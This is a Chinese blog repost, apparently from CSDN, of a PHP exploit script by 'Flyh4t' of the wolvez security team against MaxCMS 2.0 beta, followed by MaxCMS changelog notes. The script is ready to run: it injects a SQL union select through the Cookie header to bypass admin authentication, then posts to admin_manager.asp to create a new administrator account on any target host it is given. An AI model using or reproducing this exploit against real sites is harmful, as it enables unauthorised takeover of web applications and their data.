马克斯cms转php,马克斯CMS2.0beta (maxcms)管理员认证绕过漏洞

<?php

print_r('

+---------------------------------------------------------------------------+

maxcms2.0 creat new admin exploit

by Flyh4t

team:wolvez security team

site:bbs.wolvez.org

dork:salemax#qq.com

+---------------------------------------------------------------------------+

');

if ($argc < 3) {

print_r('

+---------------------------------------------------------------------------+

Usage: php '.$argv[0].' host path

host: target server (ip/hostname)

path: path to maxcms

Example:

php '.$argv[0].' localhost /maxcms2/

+---------------------------------------------------------------------------+

');

exit;

}

error_reporting(7);

ini_set('max_execution_time', 0);

$host = $argv[1];

$path = $argv[2];

$name = rand(1,10000);

$cmd = 'm_username=flyh4t'.$name.'&m_pwd=wolvez&m_pwd2=wolvez&m_level=0';

$resp = send($cmd);

if (!eregi('alert',$resp)) {echo"[~]bad luck,exploit failed";exit;}

print_r('

+---------------------------------------------------------------------------+

[+]cool,exploit seccuss

[+]you have add a new adminuser flyh4t'.$name.'/wolvez

+---------------------------------------------------------------------------+

');

function send($cmd)

{

global $host, $path;

$message = "POST ".$path."admin/admin_manager.asp?action=add HTTP/1.1\r\n";

$message .= "Accept: */*\r\n";

$message .= "Referer: http://$host$path\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "User-Agent: flyh4t\r\n";

$message .= "X-Forwarded-For:1.1.1.1\r\n";

$message .= "Host: $host\r\n";

$message .= "Content-Length: ".strlen($cmd)."\r\n";

$message .= "Cookie: m_username=flyh4t'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin; m_level=0; checkflyh4t'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin=7728a57dcd5ae1e69cf0aee02ba66de6\r\n";

$message .= "Connection: Close\r\n\r\n";

$message .= $cmd;

echo $message;

$fp = fsockopen($host, 80);

fputs($fp, $message);

$resp = '';

while ($fp && !feof($fp))

$resp .= fread($fp, 1024);

echo $resp;

return $resp;

}

?>

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
此次马克斯CMS2.0全新架构,速度性能都有极大提升 压缩里的标签文档为开发版文档,详细使用标签文档迟些会整理发出。 安装时默认是选的 站外 ,即不能连播,如果需要连播或是自动播放,请自己选站内。 请在IIS下调试,动态版请指定默认文档为index.asp,动态版是有缓存的,请修改过数据或是模板后在后台清除缓存然后前台看效果。 程序更新历史记录: 2009.06.14**11:51土豆播放器失效修正,/js/play.swf 2009.05.20**18:06增加标签[videolist:playlink],[channellist:playlink],{playpage:nolinkactor};内容也播放页以下标签增加长度控制{playpage:des}{playpage:nolinkactor} {playpage:name};修正后台自定义快捷菜单容错性;更新/admin/admin_makehtml.asp,/admin/admin_selfmenu.asp,/inc/mainclass.asp,commonfun.asp,/content/index.asp,/play/index.asp 2009.05.15**11:51修改sqlserver版的makeDatabase.asp,建空库时插入后台账号信息、便于登陆后台 2009.05.14**2:30发布sqlserver完整包 2009.05.12**22:10改进评论显示,剥离留言本样式与模板的关联,去除部分弹出层改为js的alert、便于用户操作,修正部分服务器上存在的google地图生成错误,更新文件gbook.asp,comment.asp,/js/function.js,/admin/admin_makehtml.asp 2009.05.07**13:31更新GVOD联播及缓冲下集、新浪高清播放器 2009.05.04**18:19更新2009新版资源库**台稳定版 2009.03.27**23:50改进程序易用性,修复图片采集bug,影片介绍为空生成错误解决,新浪高清更换播放器,改进后台添加下载地址等(因此次无必须功能升级,故未在后台更新提示) 2009.03.23**18:13增加影片seo关键字标签{playpage:note},更新文件/inc/CommonFun.asp,/inc/MainClass.asp,/play/index.asp,/content/index.asp,/admin/admin_makehtml.asp 2009.03.20**23:49增加远古高清和ku6的支持,更新文件/js/webplayer2008.html,/js/play.swf,/inc/playerKinds.xml,/admin/images/main.js 2009.03.20凌晨01:15更新自定义播放页是否生成 2009.03.17增加影片某一集名称标签{playpage:part},更新文件/play/index.asp 2009.03.17播放器支持gvod, 更新文件/js/play.swf , /js/gvod.html , /inc/playerKinds.xml , /admin/images/main.js , /admin/images/version.xml 2009.03.16修正新浪专辑采集问题,以及后台采集资源后时间更新问题,修改文件/admin/admin_resourcelib.asp,admin_webgather.asp 2009.03.07修正qvod播放器问题,修改了/js/play.swf,/js/play.js文件解决在IFRAME下播放问题
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值